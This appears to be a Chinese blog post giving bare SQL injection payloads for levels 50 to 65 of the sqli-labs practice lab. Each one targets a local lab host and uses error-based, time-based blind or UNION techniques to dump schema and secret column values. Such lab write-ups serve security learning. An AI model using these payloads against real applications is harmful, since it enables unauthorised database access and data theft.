【20171105早】sqli-libs Less 50-65

Less 50-65 题目类型都没有新奇的注入方式，基本上是以往类型的注入，或者是复合型注入。老黑不进行多加赘述了，多加解释，只会看低读者的智商。payload如下所示

 1 Less 50
 2 http://192.168.162.135/sqli-libs/Less-50/?sort=1 and extractvalue(1, concat(0x7e, database()))--+
 3 Less 51
 4 http://192.168.162.135/sqli-libs/Less-51/?sort=1' and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
 5 Less 52
 6 http://192.168.162.135/sqli-libs/Less-52/?sort=1 and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
 7 Less 53
 8 http://192.168.162.135/sqli-libs/Less-53/?sort=1' and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
 9 Less 54
10 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
11 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema ='challenges' and table_name='POV9ATA70T')--+
12 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,(select group_concat(id,0x7c,sessid,0x7c,secret_Y7BB,0x7c,tryy) from challenges.POV9ATA70T)--+
13 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,version(),database()--+
14 Less 55
15 http://192.168.162.135/sqli-libs/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
16 Less 56
17 http://192.168.162.135/sqli-libs/Less-56/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
18 Less 57
19 http://192.168.162.135/sqli-libs/Less-57/?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
20 Less 58
21 http://192.168.162.135/sqli-libs/Less-58/?id=-1' union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
22 Less 59:
23 http://192.168.162.135/sqli-libs/Less-59/?id=-1 union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
24 Less 60:
25 http://192.168.162.135/sqli-libs/Less-60/?id=-1") union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
26 Less 61:
27 http://192.168.162.135/sqli-libs/Less-61/?id=-1')) union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
28 Less 62:
29 http://192.168.162.135/sqli-libs/Less-62/?id=1') and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+
30 Less 63:
31 http://192.168.162.135/sqli-libs/Less-63/?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+
32 Less 64:
33 http://192.168.162.135/sqli-libs/Less-64/?id=1)) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+
34 Less 65:
35 http://192.168.162.135/sqli-libs/Less-65/?id=1") and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+

相关阅读:
.net中实现运行时从字符串动态创建对象
 C# 用　VB.net 函數庫　實現全角與半角轉換
 實現.net 加載插件方式
 VS2008下載
 Lotus Notes Send EMail from VB or VBA
用C#写vs插件中的一些Tip
SQL2005中异常处理消息框可直接使用
 C#路径/文件/目录/I/O常见操作汇总
 利用.net反射动态调用指定程序集的中的方法
 说说今年的计划
原文地址：https://www.cnblogs.com/heijuelou/p/7788968.html